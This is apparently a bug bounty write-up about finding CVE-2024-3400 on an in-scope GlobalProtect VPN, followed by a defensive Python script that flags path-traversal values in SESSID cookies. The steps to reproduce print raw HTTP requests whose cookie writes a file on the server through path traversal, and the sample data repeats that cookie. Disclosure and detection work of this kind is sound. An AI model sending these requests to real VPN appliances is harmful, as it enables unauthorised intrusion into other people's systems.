Hey Hunters, I am back with another find, so let's start.
I was searching for a VDP to hunt on (VDP is easy), so I opened H1 and started looking for a program, and I found one.
I was looking at the scope when I saw the URL vpn.redacted.com. I opened the URL and it was a VPN using the GlobalProtect protocol. I had recently seen a CVE against that software: CVE-2024-3400.
I started the exploit for the CVE, and the target was vulnerable to it.
Steps to Reproduce
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: redacted.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
The above request will create a file on the server named poc.txt.
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: redacted.com
Connection: close
Now send this request. If you get 403 Forbidden, congratulations, it's working; if you get 404, go back and find another target.
After getting 403 Forbidden, I immediately reported it to the program. Within 1 hour they responded.
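For defenders, the first request in the steps above has a clear signature: a SESSID cookie that carries a file path instead of a session token. The following is an added example, not part of the original post, that parses captured HTTP requests and flags such cookies. The allowed SESSID format (letters, digits, hyphens) is an assumption, and the benign and percent-encoded samples are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate SESSID is a plain token (letters, digits, hyphens).
SAFE_SESSID = re.compile(r"^[A-Za-z0-9-]{1,128}$")
TRAVERSAL = re.compile(r"\.\.[/\\]|^[/\\]")  # "../" anywhere, or an absolute path

def parse_request(raw):
    """Split a raw HTTP request into (method, path, lower-cased headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def sessid_values(cookie_header):
    """Return each SESSID value, percent-decoded until it stops changing."""
    values = []
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == "SESSID":
            for _ in range(3):  # bounded loop, catches double encoding
                value, previous = unquote(value), value
                if value == previous:
                    break
            values.append(value)
    return values

def inspect(raw):
    """Return a list of findings for one captured request."""
    method, path, headers = parse_request(raw)
    findings = []
    for value in sessid_values(headers.get("cookie", "")):
        if TRAVERSAL.search(value):
            findings.append(f"SESSID path traversal {value!r} on {method} {path}")
        elif not SAFE_SESSID.match(value):
            findings.append(f"SESSID unexpected format {value!r} on {method} {path}")
    return findings

def sample_request(cookie):  # builds a sample request around one Cookie header
    return ("POST /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: redacted.com\r\n"
            f"Cookie: {cookie}\r\nContent-Length: 0\r\n\r\n")

# The first cookie is the one shown in the post; the other two are constructed.
PAGE_REQUEST = sample_request("SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;")
BENIGN_REQUEST = sample_request("SESSID=3f9c2b7a-51de-4c0b-9a77-0e1d2c3b4a5f")
ENCODED_REQUEST = sample_request("SESSID=%2F..%2F..%2Ftmp%2Fconstructed")
```

Calling `inspect()` on each sample returns one traversal finding for the request from the post, none for the benign token, and one for the percent-encoded variant.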